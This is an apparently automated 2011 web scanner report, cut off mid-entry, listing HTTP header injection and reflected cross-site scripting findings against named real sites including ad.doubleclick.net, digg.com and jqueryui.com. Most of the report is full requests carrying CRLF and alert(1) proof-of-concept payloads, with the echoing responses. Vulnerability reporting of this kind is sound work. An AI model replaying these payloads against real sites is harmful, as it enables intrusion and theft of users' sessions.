XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07092011-01

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/bzj.techflash/home_page

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49448%0d%0a875587022d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49448%0d%0a875587022d3/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49448
875587022d3/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820:
Date: Wed, 06 Jul 2011 14:01:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9fae7%0d%0ae1ef4895d68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9fae7%0d%0ae1ef4895d68/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9fae7
e1ef4895d68/N3285.google/B2343920.122;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 06 Jul 2011 11:56:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected) previous next
There are 100 instances of this issue:

http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]
http://adonmax.com/afr.php [campaignid parameter]
http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]
http://adonmax.com/favicon.ico [REST URL parameter 1]
http://api.mixpanel.com/track/ [callback parameter]
http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]
https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]
http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
http://digg.com/ [name of an arbitrarily supplied request parameter]
http://digg.com/ajax/submit/crawl [REST URL parameter 1]
http://digg.com/ajax/submit/crawl [REST URL parameter 2]
http://digg.com/ajax/submit/crawl [REST URL parameter 3]
http://digg.com/login [REST URL parameter 1]
http://digg.com/register [REST URL parameter 1]
http://digg.com/search [REST URL parameter 1]
http://digg.com/submit [REST URL parameter 1]
http://digg.com/topic [REST URL parameter 1]
http://digg.com/upcoming [REST URL parameter 1]
http://jqueryui.com/themeroller/ [bgColorActive parameter]
http://jqueryui.com/themeroller/ [bgColorContent parameter]
http://jqueryui.com/themeroller/ [bgColorDefault parameter]
http://jqueryui.com/themeroller/ [bgColorError parameter]
http://jqueryui.com/themeroller/ [bgColorHeader parameter]
http://jqueryui.com/themeroller/ [bgColorHighlight parameter]
http://jqueryui.com/themeroller/ [bgColorHover parameter]
http://jqueryui.com/themeroller/ [bgColorOverlay parameter]
http://jqueryui.com/themeroller/ [bgColorShadow parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]
http://jqueryui.com/themeroller/ [bgTextureActive parameter]
http://jqueryui.com/themeroller/ [bgTextureContent parameter]
http://jqueryui.com/themeroller/ [bgTextureDefault parameter]
http://jqueryui.com/themeroller/ [bgTextureError parameter]
http://jqueryui.com/themeroller/ [bgTextureHeader parameter]
http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]
http://jqueryui.com/themeroller/ [bgTextureHover parameter]
http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]
http://jqueryui.com/themeroller/ [bgTextureShadow parameter]
http://jqueryui.com/themeroller/ [borderColorActive parameter]
http://jqueryui.com/themeroller/ [borderColorContent parameter]
http://jqueryui.com/themeroller/ [borderColorDefault parameter]
http://jqueryui.com/themeroller/ [borderColorError parameter]
http://jqueryui.com/themeroller/ [borderColorHeader parameter]
http://jqueryui.com/themeroller/ [borderColorHighlight parameter]
http://jqueryui.com/themeroller/ [borderColorHover parameter]
http://jqueryui.com/themeroller/ [cornerRadius parameter]
http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]
http://jqueryui.com/themeroller/ [fcActive parameter]
http://jqueryui.com/themeroller/ [fcContent parameter]
http://jqueryui.com/themeroller/ [fcDefault parameter]
http://jqueryui.com/themeroller/ [fcError parameter]
http://jqueryui.com/themeroller/ [fcHeader parameter]
http://jqueryui.com/themeroller/ [fcHighlight parameter]
http://jqueryui.com/themeroller/ [fcHover parameter]
http://jqueryui.com/themeroller/ [ffDefault parameter]
http://jqueryui.com/themeroller/ [fsDefault parameter]
http://jqueryui.com/themeroller/ [fwDefault parameter]
http://jqueryui.com/themeroller/ [iconColorActive parameter]
http://jqueryui.com/themeroller/ [iconColorContent parameter]
http://jqueryui.com/themeroller/ [iconColorDefault parameter]
http://jqueryui.com/themeroller/ [iconColorError parameter]
http://jqueryui.com/themeroller/ [iconColorHeader parameter]
http://jqueryui.com/themeroller/ [iconColorHighlight parameter]
http://jqueryui.com/themeroller/ [iconColorHover parameter]
http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]
http://jqueryui.com/themeroller/ [offsetTopShadow parameter]
http://jqueryui.com/themeroller/ [opacityOverlay parameter]
http://jqueryui.com/themeroller/ [opacityShadow parameter]
http://jqueryui.com/themeroller/ [thicknessShadow parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]
http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439b8"-alert(1)-"4e414bdc8a7 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4883
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:56:12 GMT
Expires: Wed, 06 Jul 2011 11:56:12 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7https://www.lowermybills.com/lending/home-refinance/?sourceid=55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 7
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78e9e"-alert(1)-"df15dde4672 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
BCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "op
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f014"-alert(1)-"d85abfc7b06 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:56:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "fal
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36475"-alert(1)-"4e6b3b90217 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
GZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
...[SNIP]...

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b7d2"-alert(1)-"e1bf4c111b8 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

